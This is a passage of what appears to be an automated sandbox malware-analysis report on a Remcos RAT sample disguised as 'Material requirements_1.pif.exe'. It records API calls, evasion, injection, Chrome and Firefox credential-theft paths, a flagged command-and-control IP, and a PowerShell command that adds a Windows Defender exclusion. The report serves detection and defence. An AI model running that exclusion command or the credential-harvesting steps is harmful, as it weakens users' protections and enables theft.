                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1067Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 715Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1294Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeAPI coverage: 8.8 %
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 5824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688Thread sleep count: 1817 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688Thread sleep time: -5451000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688Thread sleep count: 8127 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe TID: 6688Thread sleep time: -24381000s >= -30000sJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796Thread sleep count: 2045 > 30Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796Thread sleep count: 898 > 30Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796Thread sleep count: 1067 > 30Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796Thread sleep count: 715 > 30Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5796Thread sleep count: 1294 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040B335
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,7_2_0041B43F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040B53A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0044D5F9 FindFirstFileExA,7_2_0044D5F9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,7_2_004089A9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00406AC2 FindFirstFileW,FindNextFileW,7_2_00406AC2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,7_2_00407A8C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_00418C79
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,7_2_00408DA7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_00406F06
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: Material requirements_1.pif.exe, 00000007.00000002.4529165570.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeAPI call chain: ExitProcess graph end nodegraph_7-47956
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043A66D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041BCF3
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00442564 mov eax, dword ptr fs:[00000030h]7_2_00442564
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0044E93E GetProcessHeap,7_2_0044E93E
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00434178
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0043A66D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00433B54
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00433CE7 SetUnhandledExceptionFilter,7_2_00433CE7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMemory written: C:\Users\user\Desktop\Material requirements_1.pif.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe7_2_00410F36
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00418764 mouse_event,7_2_00418764
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00433E1A cpuid 7_2_00433E1A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetLocaleInfoW,7_2_004510CA
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: EnumSystemLocalesW,7_2_004470BE
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_004511F3
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetLocaleInfoW,7_2_004512FA
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_004513C7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetLocaleInfoW,7_2_004475A7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetLocaleInfoA,7_2_0040E679
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_00450A8F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: EnumSystemLocalesW,7_2_00450D52
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: EnumSystemLocalesW,7_2_00450D07
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: EnumSystemLocalesW,7_2_00450DED
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00450E7A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeQueries volume information: C:\Users\user\Desktop\Material requirements_1.pif.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00404915 GetLocalTime,CreateEventA,CreateThread,7_2_00404915
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041A7B2 GetComputerNameExW,GetUserNameW,7_2_0041A7B2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_0044801F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040B335
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: \key3.db7_2_0040B335

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0PJCBGJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4529165570.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: cmd.exe7_2_00405042

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		11
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		11
                Windows Service                		1
                Bypass User Account Control                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol111
                Input Capture                		2
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		Logon Script (Windows)1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
                Windows Service                		12
                Software Packing                		NTDS4
                File and Directory Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script121
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets33
                System Information Discovery                		SSHKeylogging1
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Bypass User Account Control                		Cached Domain Credentials21
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                File Deletion                		DCSync31
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Masquerading                		Proc Filesystem2
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Modify Registry                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                Virtualization/Sandbox Evasion                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task121
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Material requirements_1.pif.exe68%ReversingLabsWin32.Trojan.Znyonm
                Material requirements_1.pif.exe64%VirustotalBrowse
                Material requirements_1.pif.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpMaterial requirements_1.pif.exefalse
                  		high
                  http://geoplugin.net/json.gp/CMaterial requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Material requirements_1.pif.exe, 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMaterial requirements_1.pif.exe, 00000000.00000002.2084001859.0000000002E39000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      87.120.116.245
                      		unknownBulgaria
                      		25206UNACS-AS-BG8000BurgasBGtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1586623
                      Start date and time:2025-01-09 12:39:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 33s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:10
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Material requirements_1.pif.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@11/16@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 64
                      • Number of non-executed functions: 207
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
